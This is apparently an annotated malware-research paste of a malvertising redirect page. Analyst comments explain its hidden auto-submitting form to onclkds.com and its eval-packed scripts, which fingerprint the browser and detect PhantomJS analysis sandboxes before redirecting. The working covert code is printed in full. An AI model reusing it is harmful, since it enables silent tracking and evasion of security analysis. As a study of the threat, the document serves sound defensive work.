MalwareBreakdown

Original full file

Feb 19th, 2017
  1. <!doctype html>
  2. <html lang="en" xmlns="http://www.w3.org/1999/html">
  3. <head>
  4. <meta charset="UTF-8">
  <!-- Analyst note: this document renders no visible content. The script at the end of the body fills the hidden
       form and submits it on load, so the page works as a redirect hop that forwards browser details with the request. -->
  5. <title>Redirect</title>
  <!-- Asks the browser to resolve avatrading.org early. No other reference to that host is visible in this listing. -->
  6. <link rel="dns-prefetch" href="//avatrading.org" />
  <!-- No-JavaScript fallback: after 1 second the browser is sent to a relative URL on the serving host carrying the same
       r, zoneid, pbk2 and uuid values as the hidden form. adparams is URL-encoded Base64 and decodes to
       "nojs=1&saved_referer=http%3A%2F%2Fmultimediaz.net%2F" (the form's copy carries nojs=0 instead). -->
  7. <noscript><meta id="meta-refresh" http-equiv="refresh" content="1; url=/?r=/mb/han&zoneid=7904&pbk2=998ee3e7778d90e04db5276995ddb7636388366283489244896&zoneid=7904&uuid=20950899-f385-4e08-9179-7f55bf462380&fs=1&ad_scheme=1&rotation_type=3&adparams=bm9qcz0xJnNhdmVkX3JlZmVyZXI9aHR0cCUzQSUyRiUyRm11bHRpbWVkaWF6Lm5ldCUyRg%3D%3D"></noscript>
  <!-- The .click rule hides the fallback link in the body (display:none). -->
  8. <style>
  9. .click {color: white;display:none;}
  10. </style>
  11.  
  12. </head>
  13. <body>
  14.  
  15.  
  <!-- Hidden GET form aimed at onclkds.com through a protocol-relative URL. It has no visible controls; submit() in the
       script below fills the empty fields and submits it, so every value here ends up in the query string. -->
  16. <form action="//onclkds.com/" method="get" id="submit-form">
  <!-- Values pre-filled by the server (presumably routing/tracking identifiers; their meaning is not visible here).
       adparams decodes (Base64) to "nojs=0&saved_referer=http%3A%2F%2Fmultimediaz.net%2F", so the referring site
       travels inside the request. -->
  17. <input type="hidden" name="r" value="/mb/han" />
  18. <input type="hidden" name="zoneid" value="7904" />
  19. <input type="hidden" name="pbk2" value="998ee3e7778d90e04db5276995ddb7636388366283489244896" />
  20. <input type="hidden" name="uuid" value="20950899-f385-4e08-9179-7f55bf462380" />
  21. <input type="hidden" name="fs" value="1" />
  22. <input type="hidden" name="ad_scheme" value="1" />
  23. <input type="hidden" name="rotation_type" value="3" />
  24. <input type="hidden" name="adparams" value="bm9qcz0wJnNhdmVkX3JlZmVyZXI9aHR0cCUzQSUyRiUyRm11bHRpbWVkaWF6Lm5ldCUyRg==" />
  <!-- x / y (ids a / b): filled with the viewport width and height by the first packed script. -->
  25. <input type="hidden" name="x" value="" id="a" />
  26. <input type="hidden" name="y" value="" id="b" />
  27.  
  <!-- ci_* fields: filled with screen, window, plugin and automation-check results by the second packed script.
       id, co, rf and hs arrive pre-filled; no script in this listing writes to them. ix receives the in-frame flag. -->
  28. <input type='hidden' name='sw' value='' id='ci_SW' /><input type='hidden' name='sh' value='' id='ci_SH' /><input type='hidden' name='wx' value='' id='ci_WX' /><input type='hidden' name='wy' value='' id='ci_WY' /><input type='hidden' name='ww' value='' id='ci_WW' /><input type='hidden' name='wh' value='' id='ci_WH' /><input type='hidden' name='wiw' value='' id='ci_WIW' /><input type='hidden' name='wih' value='' id='ci_WIH' /><input type='hidden' name='wfc' value='' id='ci_WFC' /><input type='hidden' name='pl' value='' id='ci_PL' /><input type='hidden' name='np' value='' id='ci_NP' /><input type='hidden' name='pt' value='' id='ci_PT' /><input type='hidden' name='nb' value='' id='ci_NB' /><input type='hidden' name='ng' value='' id='ci_NG' /><input type='hidden' name='dm' value='' id='ci_DM' /><input type='hidden' name='cf' value='' id='ci_CF' /><input type='hidden' name='id' value='d0a3978d8093e9bd0b5b4573d71d3007' id='ci_ID' /><input type='hidden' name='co' value='0' id='ci_co' /><input type='hidden' name='rf' value='1' id='ci_rf' /><input type='hidden' name='hs' value='5d01a8716bbed2e9f5ffbb6af2350352' id='ci_hs' /> <input type="hidden" name="ix" value="" id="ix" />
  <!-- Second field named "fs" (the first is pre-set to 1 above); this one receives the Flash-detection result. -->
  29. <input type="hidden" name="fs" value="" id="fs" />
  <!-- timeout is changed to 1 only by submitByTimeout(). -->
  30. <input type="hidden" name="timeout" value="0" id="timeout" />
  31. </form>
  <!-- Fallback link hidden by the .click rule; nothing in this listing makes it visible. -->
  32. <a href="/index.php?r=/bl&zoneid=7904" class="click">click here</a>
  33.  
  34. <script type="text/javascript">
  // Implicit globals (no var). mTop and mSelf are not read anywhere else in this listing;
  // submited is the run-once guard checked at the top of submit().
  35. mTop = top;
  36. mSelf = self;
  37. submited = false;
  38.  
  // submit(): runs once (guarded by `submited`), writes browser and environment details into the hidden form fields,
  // then submits the form to its action URL. Returns false on a repeat call and undefined otherwise.
  39. function submit() {
  40.  
  41. if (submited) {
  42. return false;
  43. }
  44.  
  45. submited = true;
  46.  
  // Packed script #1: the eval(function(p,a,c,k,e,d){...}) wrapper rebuilds the source from the string table and runs it.
  // Unpacked, it stores the viewport width/height in the fields with ids "a"/"b" and sets "ix" to 1 when
  // window.self !== window.top (page is framed), 0 when it is not, and 2 when the comparison throws.
  // For triage, the unpacked text can be read by printing the wrapper's return value instead of passing it to eval.
  47. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c a;c b;c 6;l(9 4.k!=\'8\'){a=4.k;b=4.m}i l(9 3.5!=\'8\'&&9 3.5.7!=\'8\'&&3.5.7!=0){a=3.5.7;b=3.5.g}i{a=3.j(\'h\')[0].7;b=3.j(\'h\')[0].g}o{6=4.n!==4.q?1:0}p(e){6=2}3.d(\'a\').f=a;3.d(\'b\').f=b;3.d(\'6\').f=6;',27,27,'|||document|window|documentElement|ix|clientWidth|undefined|typeof|||var|getElementById||value|clientHeight|body|else|getElementsByTagName|innerWidth|if|innerHeight|self|try|catch|top'.split('|'),0,{}));
  48.  
  49.  
  // Flash detection in clear text: flash becomes 1 when a Flash plugin (navigator.mimeTypes) or ActiveX control reports a
  // major version above 0, stays 0 when none is found, and becomes 2 when detection throws.
  50. var flash = 0;
  51. try {
  52. var FlashDetect=new function(){
  53. var self=this;self.installed=false;self.raw="";self.major=-1;self.minor=-1;self.revision=-1;self.revisionStr="";var activeXDetectRules=[{"name":"ShockwaveFlash.ShockwaveFlash.7","version":function(obj){return getActiveXVersion(obj);}},{"name":"ShockwaveFlash.ShockwaveFlash.6","version":function(obj){var version="6,0,21";try{obj.AllowScriptAccess="always";version=getActiveXVersion(obj);}catch(err){}
  54. return version;}},{"name":"ShockwaveFlash.ShockwaveFlash","version":function(obj){return getActiveXVersion(obj);}}];var getActiveXVersion=function(activeXObj){var version=-1;try{version=activeXObj.GetVariable("$version");}catch(err){}
  55. return version;};var getActiveXObject=function(name){var obj=-1;try{obj=new ActiveXObject(name);}catch(err){obj={activeXError:true};}
  56. return obj;};var parseActiveXVersion=function(str){var versionArray=str.split(",");return{"raw":str,"major":parseInt(versionArray[0].split(" ")[1],10),"minor":parseInt(versionArray[1],10),"revision":parseInt(versionArray[2],10),"revisionStr":versionArray[2]};};var parseStandardVersion=function(str){var descParts=str.split(/ +/);var majorMinor=descParts[2].split(/\./);var revisionStr=descParts[3];return{"raw":str,"major":parseInt(majorMinor[0],10),"minor":parseInt(majorMinor[1],10),"revisionStr":revisionStr,"revision":parseRevisionStrToInt(revisionStr)};};var parseRevisionStrToInt=function(str){return parseInt(str.replace(/[a-zA-Z]/g,""),10)||self.revision;};self.majorAtLeast=function(version){return self.major>=version;};self.minorAtLeast=function(version){return self.minor>=version;};self.revisionAtLeast=function(version){return self.revision>=version;};self.versionAtLeast=function(major){var properties=[self.major,self.minor,self.revision];var len=Math.min(properties.length,arguments.length);for(i=0;i<len;i++){if(properties[i]>=arguments[i]){if(i+1<len&&properties[i]==arguments[i]){continue;}else{return true;}}else{return false;}}};self.FlashDetect=function(){if(navigator.plugins&&navigator.plugins.length>0){var type='application/x-shockwave-flash';var mimeTypes=navigator.mimeTypes;if(mimeTypes&&mimeTypes[type]&&mimeTypes[type].enabledPlugin&&mimeTypes[type].enabledPlugin.description){var version=mimeTypes[type].enabledPlugin.description;var versionObj=parseStandardVersion(version);self.raw=versionObj.raw;self.major=versionObj.major;self.minor=versionObj.minor;self.revisionStr=versionObj.revisionStr;self.revision=versionObj.revision;self.installed=true;}}else if(navigator.appVersion.indexOf("Mac")==-1&&window.execScript){var version=-1;for(var i=0;i<activeXDetectRules.length&&version==-1;i++){var obj=getActiveXObject(activeXDetectRules[i].name);if(!obj.activeXError){self.installed=true;version=activeXDetectRules[i].version(obj);if(version!=-1){var 
versionObj=parseActiveXVersion(version);self.raw=versionObj.raw;self.major=versionObj.major;self.minor=versionObj.minor;self.revision=versionObj.revision;self.revisionStr=versionObj.revisionStr;}}}}}();
  57. };
  58.  
  59. if (FlashDetect.major > 0) {
  60. flash = 1;
  61. }
  62. } catch (e) {
  63. flash = 2;
  64. }
  65.  
  // The Flash result goes into the field with id "fs" (submitted as a second "fs" parameter).
  66. window.document.getElementById("fs").value=flash;
  67.  
  // Packed script #2 (same wrapper, base-62 table). Its string table shows what is gathered into an object named QC and
  // copied to the ci_* fields by QCDone(): screen.width, window screenX/screenY, outer and inner window size,
  // top.frames.length, document.location.href, whether navigator.plugins is populated, navigator.sendBeacon and
  // navigator.geolocation availability, a second Flash check (CF), and window.callPhantom || window._phantom (PT).
  // callPhantom/_phantom are globals exposed by PhantomJS, so PT tells the receiving server that the visitor is a
  // headless/automated browser; analysis sandboxes that expose them may be served different content.
  // NOTE(review): SW and SH are both read from screen.width; DM is never assigned before it is copied to ci_DM;
  // document.referrer is read into QC.RF but QCDone() does not copy it to any field.
  68. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b 4={};8{4.17=n.1b.1p;4.R=n.1b.1p}5(e){4.17=-1;4.R=-1}8{4.S=n.1u;4.X=n.1r}5(e){4.S=-1;4.X=-1}8{4.V=n.1O;4.T=n.1N}5(e){4.V=-1;4.T=-1}8{4.Q=n.1M;4.14=n.1K}5(e){4.Q=-1;4.14=-1}8{4.Y=n.1B.1C.z}5(e){4.Y=-1}8{4.15=f.1D.1A}5(e){4.15=\'-\'}8{4.1j=f.1z}5(e){4.1j=\'-\'}8{4.19=(!(v.G 1w 1x)||v.G.z==0)?0:1}5(e){4.19=-1}8{4.18=n.1y||n.1E}5(e){4.18=\'-\'}8{4.11=1k(v.1F)==="h"?1:0}5(e){4.11=-1}8{4.P=1k(v.1v)!=="1J"?1:0}5(e){4.P=-1}4.H=0;8{b 13=1f h(){b 9=1G;9.N=1c;9.w="";9.p=-1;9.s=-1;9.q=-1;9.r="";b L=[{"C":"A.A.7","c":h(l){m K(l)}},{"C":"A.A.6","c":h(l){b c="6,0,21";8{l.1H="1I";c=K(l)}5(O){}m c}},{"C":"A.A","c":h(l){m K(l)}}];b K=h(1e){b c=-1;8{c=1e.1t("$c")}5(O){}m c};b 1i=h(C){b l=-1;8{l=1f 1q(C)}5(O){l={1n:F}}m l};b 1l=h(t){b D=t.I(",");m{"w":t,"p":B(D[0].I(" ")[1],10),"s":B(D[1],10),"q":B(D[2],10),"r":D[2]}};b 1g=h(t){b 1a=t.I(/ +/);b 16=1a[2].I(/\\./);b r=1a[3];m{"w":t,"p":B(16[0],10),"s":B(16[1],10),"r":r,"q":1o(r)}};b 1o=h(t){m B(t.1s(/[a-1L-Z]/g,""),10)||9.q};9.2f=h(c){m 9.p>=c};9.2g=h(c){m 9.s>=c};9.2e=h(c){m 9.q>=c};9.2d=h(p){b J=[9.p,9.s,9.q];b 12=2a.2b(J.z,M.z);1m(i=0;i<12;i++){u(J[i]>=M[i]){u(i+1<12&&J[i]==M[i]){2i}W{m F}}W{m 1c}}};9.13=h(){u(v.G&&v.G.z>0){b E=\'1P/x-2c-2h\';b y=v.y;u(y&&y[E]&&y[E].U&&y[E].U.1d){b c=y[E].U.1d;b o=1g(c);9.w=o.w;9.p=o.p;9.s=o.s;9.r=o.r;9.q=o.q;9.N=F}}W u(v.2k.2j("29")==-1&&n.1V){b c=-1;1m(b i=0;i<L.z&&c==-1;i++){b l=1i(L[i].C);u(!l.1n){9.N=F;c=L[i].c(l);u(c!=-1){b o=1l(c);9.w=o.w;9.p=o.p;9.s=o.s;9.q=o.q;9.r=o.r}}}}}()};u(13.p>0){4.H=1}}5(e){4.H=2}8{1h(4)}5(e){};h 
1h(d){8{f.k(\'1Y\').j=d.17}5(e){}8{f.k(\'1Z\').j=d.R}5(e){}8{f.k(\'26\').j=d.S}5(e){}8{f.k(\'27\').j=d.X}5(e){}8{f.k(\'25\').j=d.V}5(e){}8{f.k(\'24\').j=d.T}5(e){}8{f.k(\'20\').j=d.Q}5(e){}8{f.k(\'22\').j=d.14}5(e){}8{f.k(\'23\').j=d.Y}5(e){}8{f.k(\'1S\').j=d.15}5(e){}8{f.k(\'1R\').j=d.19}5(e){}8{f.k(\'1Q\').j=d.18}5(e){}8{f.k(\'1T\').j=d.11}5(e){}8{f.k(\'1U\').j=d.P}5(e){}8{f.k(\'1X\').j=d.1W}5(e){}8{f.k(\'28\').j=d.H}5(e){}};',62,145,'||||QC|catch|||try|self||var|version|||document||function||value|getElementById|obj|return|window|versionObj|major|revision|revisionStr|minor|str|if|navigator|raw||mimeTypes|length|ShockwaveFlash|parseInt|name|versionArray|type|true|plugins|CF|split|properties|getActiveXVersion|activeXDetectRules|arguments|installed|err|NG|WIW|SH|WX|WH|enabledPlugin|WW|else|WY|WFC|||NB|len|FlashDetect|WIH|PL|majorMinor|SW|PT|NP|descParts|screen|false|description|activeXObj|new|parseStandardVersion|QCDone|getActiveXObject|RF|typeof|parseActiveXVersion|for|activeXError|parseRevisionStrToInt|width|ActiveXObject|screenY|replace|GetVariable|screenX|geolocation|instanceof|PluginArray|callPhantom|referrer|href|top|frames|location|_phantom|sendBeacon|this|AllowScriptAccess|always|undefined|innerHeight|zA|innerWidth|outerHeight|outerWidth|application|ci_PT|ci_NP|ci_PL|ci_NB|ci_NG|execScript|DM|ci_DM|ci_SW|ci_SH|ci_WIW||ci_WIH|ci_WFC|ci_WH|ci_WW|ci_WX|ci_WY|ci_CF|Mac|Math|min|shockwave|versionAtLeast|revisionAtLeast|majorAtLeast|minorAtLeast|flash|continue|indexOf|appVersion'.split('|'),0,{}))
  69.  
  // Native form submission: everything gathered above leaves the browser as GET query parameters to the action host.
  70. window.document.getElementById("submit-form").submit();
  71. }
  72.  
  // submitByTimeout(): sets the hidden "timeout" field to 1, then calls submit(). No caller or timer for it is visible
  // in this listing; once submit() has already run, the `submited` guard makes the inner call return false.
  73. function submitByTimeout(){
  74. window.document.getElementById("timeout").value=1;
  75. submit();
  76. }
  // Called as soon as the script is parsed (the form above it already exists), so the data collection and the
  // redirect happen on page load without any user interaction.
  77. submit();
  78.  
  79. </script>
  80. </body>
  81. </html>